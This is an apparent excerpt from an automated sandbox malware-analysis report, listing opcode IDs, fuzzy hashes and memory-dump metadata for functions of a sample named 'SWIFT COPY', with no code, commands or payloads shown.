                                                                                              • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                              • Instruction Fuzzy Hash: FE414F71A00709EFDB28CF98C981AAABBF8FF18704B10896DE556D7655D730EA44CF60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4bbbf40ffdc7661e2e17f44e93344910e18687468177599069b1bf5db12d68af
                                                                                              • Instruction ID: 975a7f48fd18e9fdb1cbdb8146db20acb64ea3876bfc0b6eaa93ecee52b2d027
                                                                                              • Opcode Fuzzy Hash: 4bbbf40ffdc7661e2e17f44e93344910e18687468177599069b1bf5db12d68af
                                                                                              • Instruction Fuzzy Hash: 444107B0501715CFC722EF2CC900766B7F5FF84328F11826AD4169B6A2DB70A981CF55
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f6688186e7765dc68d533164e39c7d8e3e327e7172495ff05d0c5560320f5d6f
                                                                                              • Instruction ID: bfd04497d6f0696219d6976c04efc2e8f1de0519b3973b84ae705e0a6fef1ca7
                                                                                              • Opcode Fuzzy Hash: f6688186e7765dc68d533164e39c7d8e3e327e7172495ff05d0c5560320f5d6f
                                                                                              • Instruction Fuzzy Hash: C6317AB1A00345DFDB12DFA8C440799BBF4FB09728F2085AED519EB691D7369942CF90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 18946083718e8ca116da60b9b140dc1fda5b1d5ec41a5200b64da0ff32aa8158
                                                                                              • Instruction ID: 15d095724861dd372fd44718ba8bfa23c440c8a74dca747424a9633da2b4ac6b
                                                                                              • Opcode Fuzzy Hash: 18946083718e8ca116da60b9b140dc1fda5b1d5ec41a5200b64da0ff32aa8158
                                                                                              • Instruction Fuzzy Hash: D94192725043059FD760DF29C845B9BBBE8FF88618F004A2EFA98C7250E7709944CB92
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 21e108ccba4b979fa183ea7d349b18d90677ca677e40ef82eb2877ffc472dd81
                                                                                              • Instruction ID: d38ec320c1da154f3ab507e2ddd3138f94bf7badf53a65db67477ed92ed88915
                                                                                              • Opcode Fuzzy Hash: 21e108ccba4b979fa183ea7d349b18d90677ca677e40ef82eb2877ffc472dd81
                                                                                              • Instruction Fuzzy Hash: D341D071A0562AAFDB01EF1CC8406A9B7F5BF44768F2482A9D816A76C0D734FD418BD0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d2b3f6b5fb4a055ad76e14e487c4b6d19bcc49662e31a477bc3cd004649ec216
                                                                                              • Instruction ID: b52385479af31be344a1dd6c6c5e576ee3995e38ec4709638e277ce6fd5a1f80
                                                                                              • Opcode Fuzzy Hash: d2b3f6b5fb4a055ad76e14e487c4b6d19bcc49662e31a477bc3cd004649ec216
                                                                                              • Instruction Fuzzy Hash: 7C41D2726046469BC324DF6CC880BABB7F5FFC8704F140619FA9497A90E730E904C7A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7098648d3f99e55f95432e702bf23e49978c9e1b85d0e0c7d4b11269ba1f9707
                                                                                              • Instruction ID: 3a58c062ec816cb02c297b7c3035ace886f44dee7645d77ee3c7024089c7670f
                                                                                              • Opcode Fuzzy Hash: 7098648d3f99e55f95432e702bf23e49978c9e1b85d0e0c7d4b11269ba1f9707
                                                                                              • Instruction Fuzzy Hash: 6C41B1302003068FDB25DF2CD884B2ABBE9EFC0368F14446DEA458B2A1DB34D941CB95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 33be6c0473419bb510702ab001840f104963738d21ee1f3acba76149947a5eb2
                                                                                              • Instruction ID: f4df08ea1db84fd3b0a310d4457ecd8937218101542d592bd5af07db68fc666c
                                                                                              • Opcode Fuzzy Hash: 33be6c0473419bb510702ab001840f104963738d21ee1f3acba76149947a5eb2
                                                                                              • Instruction Fuzzy Hash: A4419271A01629CFCF15EF6DC98099DFBF1FF98328B2085AED466A7290D734A901CB40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                              • Instruction ID: bedceeb708749b24d267882218f2a817949e06fd4c965f126dc3b5c340bfffcb
                                                                                              • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                              • Instruction Fuzzy Hash: A9312731A04244AFDB219B6CCC40BDFBFE8AF14758F048565F855D7352C274A884CBA4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dfd86d4c91e01d299720c08c55f924c419461b740be212c9cd078344d08a1cfa
                                                                                              • Instruction ID: cd1add5f7af7f1ae9211dab32b10707dbd3104dc67a7857e93e1e8dd24fbfa74
                                                                                              • Opcode Fuzzy Hash: dfd86d4c91e01d299720c08c55f924c419461b740be212c9cd078344d08a1cfa
                                                                                              • Instruction Fuzzy Hash: 00318A35740716ABD732AF599C41FAB7AB9EB58B58F000038FA04BF291DA64DC00C790
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4738a268907ea17cd5b66137c6299b42717cee7db687a95a12295754fee07cf2
                                                                                              • Instruction ID: 30cc04a7106c1cf0a5c31a88c4f613358daec822b5ae13b47baf3135085522d0
                                                                                              • Opcode Fuzzy Hash: 4738a268907ea17cd5b66137c6299b42717cee7db687a95a12295754fee07cf2
                                                                                              • Instruction Fuzzy Hash: 3131E5322053219FC731DF1DD884E56B7E5FB88368F46446DE999DB291D730E851CB80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 70f0affbfac80aa12db53460a6135ef4fd86a5b3410c507c2a072eacf49f8bfb
                                                                                              • Instruction ID: 45eb89ac6f5846a3989dbc8c6b8f8416e69efcd4dde11bfa481849525c4ca9c5
                                                                                              • Opcode Fuzzy Hash: 70f0affbfac80aa12db53460a6135ef4fd86a5b3410c507c2a072eacf49f8bfb
                                                                                              • Instruction Fuzzy Hash: DE419F31200B45DFDB26CF28C981BD67BE9AF55318F05446DFA998B650C774E844CB94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 98677844f42684ea05414b52d7051633257a5fd4d8ccce6bd19f05f2a6fbfa78
                                                                                              • Instruction ID: 405865a159b36e9853ecfeed184a02334d8305a4dc7cb9e7c8cc454bf968fde1
                                                                                              • Opcode Fuzzy Hash: 98677844f42684ea05414b52d7051633257a5fd4d8ccce6bd19f05f2a6fbfa78
                                                                                              • Instruction Fuzzy Hash: B931BC31204311AFDB20DF28C884A2AB7E5FB88728F06456DF999DB390E730E851CB91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ab6f5e4d4afad06dfea02d4cdeb3c8b6c507bf7cd6f47fbd0bd57030eb6469e6
                                                                                              • Instruction ID: a37489b14a7765c8241f83a9a9cd142aae882691295b2ace360b49a1b6f8560e
                                                                                              • Opcode Fuzzy Hash: ab6f5e4d4afad06dfea02d4cdeb3c8b6c507bf7cd6f47fbd0bd57030eb6469e6
                                                                                              • Instruction Fuzzy Hash: F531C4322496969BF726579CC95CB657BD8FB41B4CF5D00B0EB869BAD1DB28D840C230
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a6c7d3413edd5fc98167e6d02a11d711f192e9cef5dda3a092dc32212f7e1677
                                                                                              • Instruction ID: 2e2c31e330b7bf8c13e19ca19035dc9fd6e0e5405013af139ae159b53cad3e10
                                                                                              • Opcode Fuzzy Hash: a6c7d3413edd5fc98167e6d02a11d711f192e9cef5dda3a092dc32212f7e1677
                                                                                              • Instruction Fuzzy Hash: 3631D2BAA0011AFBDB25DF98CC81BAEB7B5FB44744F454169EA00AB244D770AD40CB94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6d3c65e4ac78535440181e2e2b71f0f1bdba5851287ce9644b1df5eea91cc94b
                                                                                              • Instruction ID: f6047341d82b53b519e0b6f5828c7403515c4df0255a2e7f840094e79adc6231
                                                                                              • Opcode Fuzzy Hash: 6d3c65e4ac78535440181e2e2b71f0f1bdba5851287ce9644b1df5eea91cc94b
                                                                                              • Instruction Fuzzy Hash: 46317336A4012DABCF21DF59DC84BDE7BF5AB98314F1001E5E508A7250CA309E918F90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d67ebd7c9dedbe7d0d434098f0c3ae7ed6c4d8df1dfb21b6228a10a400654f2d
                                                                                              • Instruction ID: f271fffdb93cd4d3735f5ea732acbddef49737ada0ca8addeefec991ad991ffb
                                                                                              • Opcode Fuzzy Hash: d67ebd7c9dedbe7d0d434098f0c3ae7ed6c4d8df1dfb21b6228a10a400654f2d
                                                                                              • Instruction Fuzzy Hash: 57319072E04219AFDB71DEADC840EAEFBF9EB44754F014436E916E7250D2709A008BA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ee8b9e6afba68ed0d3a49a2a820bad0809409c6f2c5b89307ac430678912ce93
                                                                                              • Instruction ID: 8abd94c038f3ca051f4a30a60f38db4fbe639308d34c03c897431afcc0ce9252
                                                                                              • Opcode Fuzzy Hash: ee8b9e6afba68ed0d3a49a2a820bad0809409c6f2c5b89307ac430678912ce93
                                                                                              • Instruction Fuzzy Hash: 4131B6B1B00616ABDB229F9DCC51B6BBBF9EF44758F14406DE605DB351DA30ED408790
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d798ad649b41f7f049b572ae0aaddbca5c601007c65dee2b6bf68c994c9f9f0f
                                                                                              • Instruction ID: baa69432bc1cff853c29a7e616454f37d1fb973877de721ae90bfe4500ab0a71
                                                                                              • Opcode Fuzzy Hash: d798ad649b41f7f049b572ae0aaddbca5c601007c65dee2b6bf68c994c9f9f0f
                                                                                              • Instruction Fuzzy Hash: 3331D732A04716DBC716EE6C8880E6BBFA5EFD4658F014529FD559B310DA30DC0187E5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 83c9ceebca70d897ca1702342c8f2424a16a6a955e1b8e6d10f5399ba1603fdf
                                                                                              • Instruction ID: 2ea4e82e981dc54dd97335a2a51b99937cb42f09c872213b00220d3308fb471f
                                                                                              • Opcode Fuzzy Hash: 83c9ceebca70d897ca1702342c8f2424a16a6a955e1b8e6d10f5399ba1603fdf
                                                                                              • Instruction Fuzzy Hash: 0D3198716097019FE721CF19C840B2BBBE5AB88708F044AADF98897391D374E804CB91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                              • Instruction ID: d0475cc7598cd04fe0939c51d60d550a2db1cdbcaf369fa2d7758b7a4b38291f
                                                                                              • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                              • Instruction Fuzzy Hash: E3312BB2B00B01AFD761CFADDD41B57BBFCBB08A54F08492DA59AD3651E634E900CB64
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8254234faa7dc710af5bf0a07f9c94c7982f5d9c86550d0b9d720c2b4347c20d
                                                                                              • Instruction ID: 8d92c1ce38e0dcca60f4cf5f99d160b44091dfaeea69dd5d2167ed385ba3c21d
                                                                                              • Opcode Fuzzy Hash: 8254234faa7dc710af5bf0a07f9c94c7982f5d9c86550d0b9d720c2b4347c20d
                                                                                              • Instruction Fuzzy Hash: 16318BB2505311CFCB11DF19D54095ABFF1FF89618F4549AEF8889B251D330E985CB92
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 464c386adf2dfdc64173dabd21f3dde46ec99fbb852e05af770c372a1682c161
                                                                                              • Instruction ID: d5d0b89dc1d5fca92fe0551e7ed0f6caa75202a2c50c8f6773dfce19fd979b66
                                                                                              • Opcode Fuzzy Hash: 464c386adf2dfdc64173dabd21f3dde46ec99fbb852e05af770c372a1682c161
                                                                                              • Instruction Fuzzy Hash: 7931D871B00205DFDB64EFA8C981E6FBBF9AB84B0CF004529D945E7654E730E985CB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                              • Instruction ID: 8c75e5bb8eff49df964ef04a011e55dbac9094d6704c087e0e5d5eb54fd17fcc
                                                                                              • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                              • Instruction Fuzzy Hash: 7A21FD35E4066B6BDB11EBB98441BEFBBB5AF54744F058036DE55E7340E2B0D9018790
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d850c4c913b06606383c2719d49a62845116222315230ec11f6206cad326762b
                                                                                              • Instruction ID: 79c37d98acff53ae49ca42dc30f55ec4b5a2c51ebdd029ce40880ee68ee5fef0
                                                                                              • Opcode Fuzzy Hash: d850c4c913b06606383c2719d49a62845116222315230ec11f6206cad326762b
                                                                                              • Instruction Fuzzy Hash: 7031F9715003118BDB31BF6CC841BA977B4EF5031CF9481A9ED499B3D2DA749986CB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                              • Instruction ID: 9f4ef08821aadacabdbd652738157773636b3f0f27f030a6b43d34298fbe0f3c
                                                                                              • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                              • Instruction Fuzzy Hash: 26213036600766B7CB26ABAD8C04ABFBBF4EF50718F40901AFE55975D1E638D940C760
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 680a953ec0b734f399de4b7edb6a0b5c7e1e305fce502d93f5782153c06db05d
                                                                                              • Instruction ID: 11a369c4cb087918bc040634623a975ceaf93b0b4ecfa2fd41fa797867cdf604
                                                                                              • Opcode Fuzzy Hash: 680a953ec0b734f399de4b7edb6a0b5c7e1e305fce502d93f5782153c06db05d
                                                                                              • Instruction Fuzzy Hash: 6E31A231A0153C9BDB31EE18CC42BEA77B9EB15758F0101A1E645A7290D674AE808F90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                              • Instruction ID: da45e5ea6bc90307dd898abac0e1a0c5786d3019cbfbf325bd88be2c9e2b2f65
                                                                                              • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                              • Instruction Fuzzy Hash: 0F217131E00609EBCB15CF58C980A8EBBB9FF48728F10C469EE159F245D675EE458B90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d8505df3a00904f4f66728ea5def281dcb69ce98752d634077e0125cc09fe59a
                                                                                              • Instruction ID: 8a40428e8585705f20e4ba46884b11f82ef79c9cbd74d6a2b387676662fc3ac2
                                                                                              • Opcode Fuzzy Hash: d8505df3a00904f4f66728ea5def281dcb69ce98752d634077e0125cc09fe59a
                                                                                              • Instruction Fuzzy Hash: 9621C172A04746DBCB22DF18C980B6B77E8FB88768F008519FE559B645D730E900CBA2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                              • Instruction ID: 0a68456b85d29696a7dcb9358caa3f712e9dafb310a38d71379a0842f241770c
                                                                                              • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                              • Instruction Fuzzy Hash: 4131AB31600618EFDB21EFA8C884F6AB7F9FF45358F1045A9E5529B690E770EE01CB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4857a5800ccf1e99bb2c1fa29c304238b84c1f385b64c6db740e3c50ac56cf6a
                                                                                              • Instruction ID: c068aa74fce09c845a218876fbef8c907decbc7d7090473f606a8c40f5b0904c
                                                                                              • Opcode Fuzzy Hash: 4857a5800ccf1e99bb2c1fa29c304238b84c1f385b64c6db740e3c50ac56cf6a
                                                                                              • Instruction Fuzzy Hash: 5E31B175600205EFCB14CF1CC8849AEB7B6FF84328B554869E8099B3A1EB31EA50CB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7e5358a32f6ea672452f6192d7ed1b4cf2ac8d5e965124a945b474859d422fef
                                                                                              • Instruction ID: 5e3942b606038c3fb8eda63503544f1c0c64579161b4a18b058ae8350cdda7f9
                                                                                              • Opcode Fuzzy Hash: 7e5358a32f6ea672452f6192d7ed1b4cf2ac8d5e965124a945b474859d422fef
                                                                                              • Instruction Fuzzy Hash: 21218D71600655ABD725DB6CC880BAAB7B8FF48744F140069FA44DBAA0E634ED40CB54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9d0f245e79ba57b157a93729d1a1eb73a0b63eb329c0b32cf9a5f1c5564f38ce
                                                                                              • Instruction ID: 664183385e4abaa942b90bf9ac48c5f141c6a097dc5c71a6f851869a9ff583f9
                                                                                              • Opcode Fuzzy Hash: 9d0f245e79ba57b157a93729d1a1eb73a0b63eb329c0b32cf9a5f1c5564f38ce
                                                                                              • Instruction Fuzzy Hash: F92125725053469FD716DFADC888F9BBBECBF90248F080456BE84CBA51E730D908C6A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 04ebb10d140b7c2cae66c4e67c1ada8255867718e57ea307c78da109c0fb9c29
                                                                                              • Instruction ID: 678308b669309c2a5e9f5ff65205c22a31ec0d1822e26b9fd6700c05726ee6cb
                                                                                              • Opcode Fuzzy Hash: 04ebb10d140b7c2cae66c4e67c1ada8255867718e57ea307c78da109c0fb9c29
                                                                                              • Instruction Fuzzy Hash: 68210B31709695DBE726576CCC54F257FD8AF41B7CF290360FE609BAE2D768D8018240
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
